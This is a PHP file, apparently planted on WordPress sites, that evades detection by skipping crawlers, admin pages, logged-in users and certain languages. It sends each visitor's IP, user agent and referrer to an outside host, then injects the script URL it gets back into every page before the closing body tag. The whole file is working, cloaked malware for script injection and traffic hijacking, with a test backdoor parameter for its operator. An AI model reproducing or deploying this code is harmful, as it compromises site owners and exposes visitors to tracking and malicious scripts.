102.php

@ini_set('display_errors', '0');
error_reporting(0);
$skipme = false;
$bad_agents = '~google|360Spider|80legs|AIBOT|Aboundex|Acunetix|AhrefsBot|Alexibot|BLEXBot|BackDoorBot|BackWeb|Baiduspider|Bandit|BatchFTP|Bigfoot|Black.Hole|BlackWidow|BlowFish|BotALot|Buddy|BuiltBotTough|Bullseye|BunnySlippers|Cegbfeieh|CheeseBot|CherryPicker|ChinaClaw|Cogentbot|Collector|Copier|CopyRightCheck|Crescent|Custo|DIIbot|DISCo|DittoSpyder|Download Demon|Download Devil|Download Wonder|Drip|EasyDL|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|Express WebPictures|Extractor|EyeNetIE|FHscan|Foobot|FrontPage|Go-Ahead-Got-It|GrabNet|Grafula|HMView|HTTrack|Harvest|IlseBot|Image Stripper|Image Sucker|Indy Library|InfoNavibot|InfoTekies|Intelliseek|InterGET|Internet Ninja|Iria|JOC|Jakarta|James BOT|Java|JennyBot|JetCar|JustView|Jyxobot|Kenjin.Spider|Keyword.Density|LNSpiderguy|LWP::Simple|LexiBot|LinkScan/8.1a.Unix|LinkWalker|LinkextractorPro|LinkpadBot|MIDown tool|MIIxpc|MJ12bot|Mag-Net|Magnet|MarkWatch|Mass Downloader|Mata.Hari|MegaIndex.ru/2.0|Memo|Microsoft URL Control|Microsoft.URL|Mirror|Missigua Locator|Mister PiX|Mozilla.\*NEWT|Mozilla\/3.Mozilla\/2.01|NAMEPROTECT|NICErsPRO|NPbot|Navroad|NearSite|Net Vampire|NetAnts|NetMechanic|NetSpider|NetZIP|Netcraft|NextGenSearchBot|NimbleCrawler|Ninja|Octopus|Offline Explorer|Offline Navigator|Openfind|OutfoxBot|PHP version tracker|PageGrabber|Papa Foto|Pockey|ProPowerBot\/2.14|ProWebWalker|Pump|QueryN.Metasearch|RMA|ReGet|RealDownload|Reaper|Recorder|RepoMonkey|SEOkicks|SearchmetricsBot|SemrushBot|Siphon|SiteExplorer|SiteSnagger|SlySearch|SmartDownload|Snake|Snapbot|Snoopy|SpaceBison|SpankBot|Sqworm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|Szukacz\/1.4|Teleport|Telesoft|The.Intraformant|TheNomad|TightTwatBot|Titan|True_bot|TurnitinBot|TurnitinBot\/1.5|URLy.Warning|VCI|Vacuum|VoidEYE|WISENutbot|WWW-Collector-E|WWWOFFLE|Web Image Collector|Web Sucker|Web.Image.Collector|WebAuto|WebBandit|WebCopier|WebEMailExtrac.\*\" bot|WebEnhancer|WebFetch|WebGo IS|WebLeacher|WebReaper|WebSauger|WebStripper|WebWhacker|WebZIP|Webclipping.com|WebmasterWorldForumBot|Website Quester|Website eXtractor|Webster|Wget|Whacker|Widow|Xaldon|Xenu|Zeus|ZmEu|Zyborg|archive.org_bot|asterias|attach|cosmos|dragonfly|eCatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|libWeb\/clsHTTP|likse|lwp-trivial|moget|niki-bot|pavuk|pcBrowser|psbot|rogerBot|sogou|spanner|spbot|suzuran|tAkeOut|turingos~i';
$bad_urls = '#xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|wp-admin|administrator#';
if (@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT'])) {
    $skipme = true;
}
if (!$skipme && function_exists('xg')) {
    $skipme = true;
}
if (!$skipme && @preg_match($bad_urls, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'])) {
    $skipme = true;
}
if (!$skipme && (@strpos($_SERVER["HTTP_ACCEPT_LANGUAGE"], 'ru') !== false OR @strpos($_SERVER["HTTP_ACCEPT_LANGUAGE"], 'en') == false)) {
    $skipme = true;
}
if (!$skipme) {
    foreach ($_COOKIE as $k => $v) {
        if (strpos($k, 'wordpress_logged_in') !== false) {
            $skipme = true;
            break;
        }
    }
}
if (isset($_REQUEST['xxxtest'])) {
    $skipme = false;
}
if (!$skipme) {
    function xg($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        } elseif (@ini_get('allow_url_fopen')) {
            return @file_get_contents($url);
        } else {
            $parts = parse_url($url);
            $target = $parts['host'];
            $port = isset($parts['port']) ? $parts['port'] : 80;
            $page = isset($parts['path']) ? $parts['path'] : '';
            $page .= isset($parts['query']) ? '?' . $parts['query'] : '';
            $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';
            $page = ($page == '') ? '/' : $page;
            if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) {
                @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 1, "usec" => 1));
                $headers = "GET $page HTTP/1.1\r\n";
                $headers .= "Host: {$parts['host']}\r\n";
                $headers .= "Connection: Close\r\n\r\n";
                if (fwrite($fp, $headers)) {
                    $resp = '';
                    while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) {
                        $resp .= $curr;
                    }
                    if (isset($curr) && $curr !== false) {
                        fclose($fp);
                        return substr(strstr($resp, "\r\n\r\n"), 3);
                    }
                }
                fclose($fp);
            }
        }
        return false;
    }
    function xu() {
        $api_url = 'http://bidsintro.trade/xxx/api.php';
        $api_key = '608c38901a26d8a5bf09cbb4fc6a8183';
        $api_campaign = 'fPJP7q';
        $keyword = urlencode($_SERVER['HTTP_HOST']);
        $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
        $ua = urlencode($_SERVER['HTTP_USER_AGENT']);
        $ip = null;
        $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR');
        foreach ($headers as $header) {
            if (!empty($_SERVER[$header])) {
                $ip = $_SERVER[$header];
                break;
            }
        }
        if (strstr($ip, ',')) {
            $tmp = explode(',', $ip);
            if (isset($_SERVER['HTTP_USER_AGENT']) && stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) {
                $ip = trim($tmp[count($tmp) - 2]);
            } else {
                $ip = trim($tmp[0]);
            }
        }
        $referrer = urlencode(@$_SERVER['HTTP_REFERER']);
        if (isset($_REQUEST['xxxtest'])) {
            $url = "$api_url?is_api=1&action=get_link&api_key=$api_key&campaign=xxxcheck&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang";
        } else {
            $url = "$api_url?is_api=1&action=get_link&api_key=$api_key&campaign=$api_campaign&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang";
        }
        return $url;
    }
    function xp($p) {
        if (strpos($p, 'xxxtestok') !== FALSE) {
            die('xxxtestok');
        }
        if (strpos($p, 'campaign_id')) {
            $res = substr($p, strpos($p, '"url":"')+7);
            $res = substr($res, 0, strpos($res, '"},"redirect"'));
            $res = str_replace('\/', '/', $res);
            if (strpos($res, '.js') !== FALSE) {
                return $res;
            }
        }
        return FALSE;
    }
    $xi = xp(xg(xu()));
    function xs($content) {
        global $xi;
        if ($xi) {
            if (strpos($xi, 'jquery')) {
                $content = preg_replace('#</body>#iUs', "<script type=\"text/javascript\" src=\"https://code.jquery.com/jquery-3.1.1.min.js\"></script>\n<script type=\"text/javascript\" src=\"$xi\"></script>\n</body>", $content, 1);
            } else {
                $content = preg_replace('#</body>#iUs', "<script type=\"text/javascript\" src=\"$xi\"></script>\n</body>", $content, 1);
            }
        }
        return $content;
    }
    if ($xi) {
        ob_start('xs');
        register_shutdown_function('ob_end_flush');
    }
}
?>